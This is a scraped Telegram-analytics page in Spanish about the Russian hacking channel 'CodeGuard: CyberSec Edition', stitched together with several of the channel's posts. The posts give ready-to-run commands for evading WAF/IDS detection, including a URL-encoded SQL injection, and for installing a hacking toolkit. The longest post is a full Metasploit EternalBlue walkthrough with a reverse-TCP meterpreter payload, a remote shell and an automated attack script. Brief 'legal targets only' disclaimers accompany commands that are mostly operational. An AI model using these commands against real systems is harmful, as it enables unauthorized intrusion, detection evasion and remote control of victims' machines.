CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Mostrar más📈 Análisis del canal de Telegram CodeGuard: CyberSec Edition
El canal CodeGuard: CyberSec Edition es un actor destacado. Actualmente la comunidad reúne a 12 639 suscriptores, ocupando la posición 10 058 en la categoría Tecnologías y Aplicaciones y el puesto 52 296 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 12 639 suscriptores.
Según los últimos datos del 22 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 614, y en las últimas 24 horas de 96, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 12.48%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 6.78% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 577 visualizaciones. En el primer día suele acumular 857 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 4.
- Intereses temáticos: El contenido se centra en temas clave como codeguard, pysec, docker, grep, контейнер.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 23 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
wafw00f https://target.com
*Быстрый сканер, который скажет, защищён ли сайт и каким WAF.*
2. Медленные и тихие сканы на `ffuf`
Стандартные сканеры палят тебя моментально. Забивай на скорость, ставь паузы и делай всё тихо:
ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -p 0.5 -t 10 -o ffuf_results.json
- -p 0.5 — полсекунды между запросами, чтобы не злить WAF/IDS
- -t 10 — не больше 10 потоков, меньше шума
3. Меняем заголовки, чтобы быть незаметным
WAF фильтрует по User-Agent и другим заголовкам — меняй их:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://target.com/path
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/path
Используй прокси и VPN, чтобы сменить IP и не светиться.
4. Кодируем ходы, чтобы сбить алгоритм
Пример с URL-кодированием полезной нагрузки:
curl "https://target.com/search?q=%27%20OR%201=1--"
Так SQL-инъекция выглядит неочевидно для WAF.
5. Медленные циклы с рандомной задержкой
Для обхода IDS:
for url in $(cat urls.txt); do
curl -A "Mozilla/5.0" "$url"
sleep $((RANDOM % 5 + 1)) # пауза случайно от 1 до 5 секунд
done
Медленный и нерегулярный трафик сложнее детектировать.
⚠️ Важно: Все инструменты запускай только на легальных целях и с разрешения владельца.
😈 CodeGuard | #pentest #WAF #OSINT #hackingtoolsgit clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
sudo ./install.sh
hacktronian
Для Android (Termux):
pkg install git python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py
📱 Есть подробный видеоруководство на YouTube для быстрого старта.
💡 Советы:
- Используй HACKTRONIAN как единый центр для запуска известных инструментов, экономя время.
- Комбинируй методы сбора информации и эксплуатации для максимальной эффективности.
- Постоянно обновляй и расширяй свои навыки с помощью этого набора.
😈 CodeGuard | #HACKTRONIAN #hackingtoolsВ этой статье Сергей — наш эксперт, который прошел путь от сисадмина до администратора средств защиты и, наконец, пентестера расскажет, где автоматизация незаменима, а где без человеческого мозга не обойтись. Пройдем по всем этапам пентеста от разведки до написания отчета, и посмотрим, как грамотно сочетать силу машин с интуицией специалиста.👩💻 Можете глянуть оригинал 😈 CodeGuard | #cybersecurity
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
# Загружаем официальный скрипт установки Metasploit с GitHub и сохраняем его в файл msfinstall
chmod +x msfinstall
# Делаем скрипт исполняемым (разрешаем запуск)
sudo ./msfinstall
# Запускаем скрипт с правами суперпользователя для установки Metasploit на систему
2. Запуск консоли Metasploit
msfconsole
# Запускаем Metasploit в интерактивном режиме — консоль откроется и готова к командам
3. Поиск подходящего эксплойта
search smb
# Ищем все эксплойты и модули, в названии или описании которых есть "smb" — часто используется в атаках на протокол SMB (например, EternalBlue)
4. Выбор эксплойта для работы
use exploit/windows/smb/ms17_010_eternalblue
# Загружаем модуль EternalBlue — один из самых известных эксплойтов для уязвимости в SMB
5. Просмотр и настройка параметров
show options
# Показываем список необходимых параметров для эксплойта — куда нужно указать цели, параметры для подключения и прочее
6. Установка IP и порта цели
set RHOST 192.168.1.100
# RHOST — IP адрес устройства жертвы, куда нацелена атака
set RPORT 445
# RPORT — порт для подключения (445 — стандартный порт SMB)
7. Настройка полезной нагрузки (payload) и параметров обратного подключения
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Payload — что именно будет выполнено после успешного взлома. Meterpreter — мощная оболочка для управления системой.
set LHOST 192.168.1.50
# LHOST — твой локальный IP-адрес, чтобы жертва могла "позвонить" тебе обратно (обратное TCP-соединение)
set LPORT 4444
# LPORT — порт, на который будет установлен обратный канал связи
8. Запуск эксплойта
exploit
# Запускаем атаку, Metasploit пытается использовать эксплойт и payload для получения доступа
9. Работа с открытыми сессиями
sessions
# Показывает список открытых сессий — активных подключений к "взломанным" машинам
10. Подключение к сессии
sessions -i 1
# Подключаемся к сессии с номером 1 для интерактивного управления удалённой системой
11. Выполнение команд в shell
shell
# Запускаем системный shell удалённого устройства – теперь можно выполнять команды, как будто ты физически работаешь на той машине
ls -la
# Команда списка файлов и папок с подробной информацией — пример простой команды для проверки доступа
12. Автоматизация через resource-файл
Создаём файл auto.rc с содержимым:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit
Запуск:
msfconsole -r auto.rc
# Запускаем msfconsole и сразу подгружаем команды из файла auto.rc — автоматизируем весь процесс и не вводим всё вручную
Важные советы для новичков
- Всегда запускай Metasploit на легальных целях и с разрешения владельцев.
- Перед тестом изучай публичные уязвимости и документацию выбранного модуля.
- Используй help и info для подробной информации о командах и эксплойтах.
- Meterpreter-сессии дают огромные возможности — от запуска команд до снятия скриншотов.
- Постепенно изучай post-exploitation модули для расширения контроля над системой.
🤔 Этот мини-гайд — базовый старт для погружения в Metasploit.
ставь реакцию 👍 и поделись постом с другом
😈 CodeGuard | #Metasploit #hackingtools💀 Linux глазами хакера Автор: Михаил Фленов Год издания: 2021Книга, если ты хочешь не просто использовать Linux, а понимать, как он работает изнутри — эта книга станет твоим главным руководством. Не про "как поставить систему". Про как сделать её безопасной, производительной и защищённой. 🧠Что внутри? - Базовое администрирование и управление доступом - Настройка Firewall и защита от атак - Настройка серверов: WEB, FTP, Proxy, DNS - Программы для электронной почты и файлообмена - Политика мониторинга и архивирования данных - Потенциальные уязвимости и как их избежать - Что делать при атаке или взломе — восстановление и предотвращение потери данных - Тестирование безопасности конфигурации (обновлённая информация для Ubuntu) 📌 В шестом издании — актуальная информация и новые инструменты для проверки безопасности. 🔝 Подходит: - Администраторам Linux - Специалистам по безопасности - Тем, кто хочет **понимать, как работает система, а не просто запускать команды** - Всем, кто хочет **строить безопасную и надёжную инфраструктуру** Безопасность начинается с понимания: - Как работают процессы в Linux - Как устроены права доступа - Какие службы могут быть уязвимы - Как защитить систему от реальных атак 📌 Эта книга — не про взлом ради взлома. Она про мышление защитника, который знает, как устроена система, чтобы не дать ей быть сломанной. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #linux #security
¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
